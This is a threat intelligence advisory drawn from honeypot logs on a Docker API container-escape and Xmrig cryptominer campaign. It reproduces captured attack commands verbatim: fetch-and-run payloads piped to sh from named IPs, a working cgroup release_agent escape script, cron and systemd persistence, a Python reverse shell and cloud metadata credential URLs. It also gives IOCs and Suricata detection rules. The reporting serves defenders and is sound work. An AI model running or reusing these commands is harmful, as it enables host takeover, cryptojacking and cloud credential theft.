TLP:CLEAR HIGH ACTIVE

Docker API Escape + Cryptominer Campaign

Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH

Executive Summary

Over a 30-day window (2026-05-25 through 2026-06-24), sensors observed a sustained campaign targeting exposed Docker APIs. The primary actor (45.198.224.5) generated over 157,000 commands across multiple sensors, employing five distinct container escape techniques — chroot /host, chroot /hostfs, chroot /mnt, cgroup release_agent exploitation, and cron persistence on the host filesystem. The escaped payload downloads and executes a script from 5.182.210.61 via base64-encoded commands, establishing both immediate and recurring persistence.

A second cluster of actors (198.13.47.111, 120.26.46.187, 45.76.202.47, 115.29.236.117, 31.56.48.179) deploys a full Xmrig cryptominer toolchain with config file, scanner binary, cron + systemd persistence, and a Python reverse shell on TCP port 666. Cloud metadata exfiltration (AWS IAM credentials, GCP service account tokens) and VMware/ONVIF infrastructure probing were also observed.

Threat Actor Profile

Attribute	Assessment
Primary IP	45.198.224.5 — 157,779 Docker commands, 30-day sustained activity
Secondary cluster	5 IPs deploying Xmrig + reverse shell toolchain
Sophistication	High — multiple container escape methods, cgroup exploitation, multi-layer persistence
Intent	Cryptomining (Xmrig), persistent access (reverse shell + cron + systemd), cloud credential theft
First observed	2026-05-25
Last observed	2026-06-24 (active)

Infrastructure Analysis

  ┌─────────────────────────────────────────────────────────────────┐
  │  Docker API exploitation + container escape                     │
  └─────────────────────────────────────────────────────────────────┘

  Attacker 45.198.224.5 ──▶ Docker API (exposed :2375/:2376)
       │
       ├── chroot /host       ──▶ host filesystem
       ├── chroot /hostfs     ──▶ host filesystem (alt mount)
       ├── chroot /mnt        ──▶ mounted volumes
       ├── cgroup release_agent ──▶ kernel-level escape
       └── /host/etc/cron.d/pwn  ──▶ cron persistence on host

       All paths execute:
         base64 → wget -O- http://5.182.210.61/ok | sh
                  || curl -s http://5.182.210.61/ok | sh

  ┌─────────────────────────────────────────────────────────────────┐
  │  Xmrig miner + reverse shell cluster (separate actors)          │
  └─────────────────────────────────────────────────────────────────┘

  198.13.47.111:80    ──▶ .real_mnd (miner), .mconf (config),
  120.26.46.187:80    ──▶ scanner-bin (self-propagation)
  45.76.202.47:80     ──▶ w (cron-persisted wrapper)
  115.29.236.117:80   ──▶ arch-specific: arm64/xmrigMiner, i386/xmrigMiner
  31.56.48.179:80     ──▶
       │
       ├── /tmp/xm (miner binary)
       ├── /tmp/xc (config file)
       ├── /tmp/.s (scanner binary)
       ├── /etc/cron.d/net-check (cron persistence, 1-min interval)
       ├── kernel-audit.service (systemd persistence, auto-restart)
       └── TCP:666 (Python reverse shell, 30s retry loop)
  

C2 / Distribution Infrastructure

IP	Role	Path / Port	Notes
5.182.210.61	Payload distribution	/ok	Primary Docker escape payload server
45.205.1.59	Payload distribution	/ok	Secondary payload server (base64 variant)
198.13.47.111	Xmrig C2 + distrib	:80 + :666	Miner, config, scanner, reverse shell
120.26.46.187	Xmrig C2 + distrib	:80 + :666	Same toolchain, adds systemd service
45.76.202.47	Xmrig C2 + distrib	:80 + :666	Same toolchain
115.29.236.117	Xmrig distrib	:80	Arch-adaptive: selects binary by uname -m
31.56.48.179	Xmrig C2 + distrib	:80 + :666	Same toolchain
45.198.224.5	Scanner / exploiter	—	157K+ Docker API commands, 30-day sustained

Container Escape Techniques

1. chroot /host, /hostfs, /mnt

The attacker attempts three filesystem mount paths to reach the host filesystem from within the container. Each variant executes the same base64-encoded payload:

# Direct execution (14,891 times)
echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8IHNoIHx8IG...
    |base64 -d|sh

# chroot /host (14,633 times)
chroot /host sh -c "echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8...
    |base64 -d|sh"

# chroot /hostfs (12,655 times)
chroot /hostfs sh -c "echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8...
    |base64 -d|sh"

# chroot /mnt (12,283 times)
chroot /mnt sh -c 'echo d2dldCAtTy0gaHR0cDovLzUuMTgyLjIxMC42MS9vayB8...
    |base64 -d|sh'

# Decoded payload:
wget -O- http://5.182.210.61/ok | sh || curl -s http://5.182.210.61/ok | sh

2. cgroup release_agent Escape

A kernel-level container escape exploiting the cgroup release_agent feature. The attacker writes a payload to /cmd, registers it as the cgroup release agent, then triggers cgroup notification to execute it on the host:

d=$(dirname $(ls -x /s*/fs/c*/*/r* 2>/dev/null | head -n1))
[ -z "$d" ] && exit 1
mkdir -p $d/w
echo 1 > $d/w/notify_on_release
hp=$(sed -n 's/.*\bperdir=\([^,]*\).*/\1/p' /etc/mtab)
printf '#!/bin/sh\n%s\n' "wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh" > /cmd
chmod +x /cmd
echo "$hp/cmd" > $d/release_agent
sh -c "echo \$\$ > $d/w/cgroup.procs"

3. Cron Persistence on Host

# Write to host's cron directory (498 times)
printf '%s\n' "* * * * * root wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh" \
  > /host/etc/cron.d/pwn
chmod 644 /host/etc/cron.d/pwn

4. Loop Persistence (nohup + chroot)

# Decoded: while true;do wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh;sleep 300;done
chroot /host sh -c "while true;do wget -O- http://5.182.210.61/ok|sh||curl -s http://5.182.210.61/ok|sh;sleep 300;done"

5. Additional variants

The attacker also uses eval $(echo ... | base64 -d), busybox sh -c, nohup ... >/dev/null 2>&1 &, and writes scripts to /host/p.sh and /mnt/p.sh with chmod 777 — maximizing the chance of successful execution across heterogeneous Docker configurations.

Xmrig Cryptominer Deployment Chain

A separate cluster of IPs deploys a full Xmrig toolchain via the Docker API. Representative payload from 198.13.47.111:

# 1. Download miner + config + scanner (multi-method fallback)
curl -sLo /tmp/xm http://198.13.47.111:80/.real_mnd
wget -q -O /tmp/xm http://198.13.47.111:80/.real_mnd
curl -sLo /tmp/xc http://198.13.47.111:80/.mconf
wget -q -O /tmp/xc http://198.13.47.111:80/.mconf

# 2. Launch miner
chmod +x /tmp/xm
/tmp/xm -c /tmp/xc >/dev/null 2>&1 &

# 3. Launch scanner (self-propagation)
curl -sLo /tmp/.s http://198.13.47.111:80/scanner-bin
chmod +x /tmp/.s
/tmp/.s >/dev/null 2>&1 &

# 4. Cron persistence (1-minute interval)
echo '*/1 * * * * root (curl -sLo /tmp/.w http://198.13.47.111:80/w)&&sh /tmp/.w' \
  > /etc/cron.d/net-check

# 5. Systemd persistence (auto-restart)
cat > /etc/systemd/system/kernel-audit.service << 'UNIT'
[Unit]
Description=Kernel Audit
After=network.target
[Service]
Type=simple
ExecStart=/bin/sh -c "(curl -sLo /tmp/.w http://120.26.46.187:80/w)&&sh /tmp/.w"
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
UNIT
systemctl daemon-reload
systemctl enable --now kernel-audit.service

# 6. Python reverse shell (TCP:666, 30s retry)
while true; do
  python3 -c "import socket,subprocess,os; s=socket.socket(); s.settimeout(30); \
    s.connect(('198.13.47.111',666)); os.dup2(s.fileno(),0); \
    os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); \
    subprocess.call(['/bin/sh','-i'])" 2>/dev/null
  sleep 30
done

Cloud Metadata Exfiltration

# AWS IMDSv1 (no token required)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/info

# GCP metadata (requires Metadata-Flavor: header — attacker likely adds it)
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Infrastructure Probing

The attacker also probes for VMware vSphere SOAP APIs and ONVIF device management:

# VMware vSphere ServiceInstance discovery
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RetrieveServiceContent xmlns="urn:internalvim25">
      <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
    </RetrieveServiceContent>
  </soap:Body>
</soap:Envelope>

# ONVIF device info
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:tds="http://www.onvif.org/ver10/device/wsdl">
  <s:Body><tds:GetDeviceInformation/></s:Body>
</s:Envelope>

MITRE ATT&CK Mapping

ID	Technique	Evidence
T1611	Escape to Host	chroot /host, /hostfs, /mnt; cgroup release_agent
T1053.003	Cron	/etc/cron.d/net-check, /host/etc/cron.d/pwn
T1543.002	Systemd Service	kernel-audit.service with auto-restart
T1496	Resource Hijacking	Xmrig miner deployment with config file
T1552.005	Cloud Instance Metadata API	AWS IMDS + GCP metadata endpoint probing
T1105	Ingress Tool Transfer	wget/curl/python urllib downloads from C2
T1071.001	Web Protocols (C2)	HTTP downloads from 5 C2 IPs; Python reverse shell on TCP:666
T1059.006	Python	Python reverse shell with socket/subprocess

Campaign Timeline

Date	Event
2026-05-25	First Docker escape commands observed. 45.198.224.5 begins sustained 30-day campaign.
2026-05-25	Xmrig cluster (198.13.47.111, 120.26.46.187) begins miner deployment.
2026-05-27	VMware SOAP + ONVIF probing observed alongside Docker exploits.
2026-06-05	Xmrig cluster adds 115.29.236.117 with arch-adaptive binary selection.
2026-06-24	Campaign still active. 45.198.224.5 continues generating commands.

Indicators of Compromise

Network — IPs

Network — URLs

Host — Persistence Artifacts

Network — C2 Port

Cloud Metadata Endpoints Probed

Detection Signatures

Suricata — Docker API Base64 Payload

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"cowrAI Docker API base64-encoded payload injection";
  flow:to_server,established;
  http.request_body; content:"d2dldCAt"; 
  content:"base64"; distance:0;
  content:"chroot"; nocase;
  threshold:type both, track by_src, count 3, seconds 60;
  classtype:trojan-activity; sid:9003010001; rev:1;
)

Suricata — cgroup release_agent Escape

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"cowrAI Docker cgroup release_agent container escape";
  flow:to_server,established;
  http.request_body; content:"notify_on_release";
  content:"release_agent"; distance:0;
  content:"cgroup.procs"; distance:0;
  classtype:trojan-activity; sid:9003010002; rev:1;
)

Suricata — Xmrig C2 Beacon (TCP:666)

alert tcp $HOME_NET any -> $EXTERNAL_NET 666 (
  msg:"cowrAI Docker Xmrig reverse shell C2 beacon";
  flow:to_server,established;
  dsize:<200;
  threshold:type both, track by_src, count 5, seconds 150;
  classtype:trojan-activity; sid:9003010003; rev:1;
)

Suricata — Cloud Metadata Exfiltration

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI Cloud metadata exfiltration from container";
  flow:to_server,established;
  http.host; content:"169.254.169.254";
  http.uri; content:"/iam/security-credentials/";
  classtype:trojan-activity; sid:9003010004; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI GCP metadata exfiltration from container";
  flow:to_server,established;
  http.host; content:"metadata.google.internal";
  http.uri; content:"/service-accounts/default/token";
  classtype:trojan-activity; sid:9003010005; rev:1;
)

Collection Methodology

Data collected by a distributed honeypot fleet running custom protocol lures that emulate exposed Docker APIs. All commands were captured at the application layer and ingested into a time-series database for analysis. The lures emulate a Docker API endpoint accepting container management commands; attacker commands are logged verbatim including base64-encoded payloads, which were decoded offline for this report.